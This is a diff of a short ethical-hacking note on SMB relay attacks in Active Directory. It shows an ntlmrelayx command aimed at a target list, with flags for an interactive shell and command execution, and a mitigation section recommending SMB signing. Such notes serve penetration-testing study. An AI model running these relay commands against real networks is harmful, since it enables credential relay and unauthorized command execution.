0xScorpio/Ethical-Hacking/Active-Directory/Initial-Attack-Vectors/SMB-Relay-attack.md

 ```bash
 sudo ntlmrelayx.py -tf targets.txt -smb2support
 ```
+> [!NOTE]
-*You can also add the following flags:
+You can also add the following flags:
-- i for interactive mode (if you're using this mode, create a listener on the specified port)
+> - i for interactive mode (if you're using this mode, create a listener on the specified port)
-- c for executing commands
+> - c for executing commands

 ## Mitigation
 - Enable SMB signing on all devices (bare in mind, this can cause performance issues with file copies especially on legacy systems)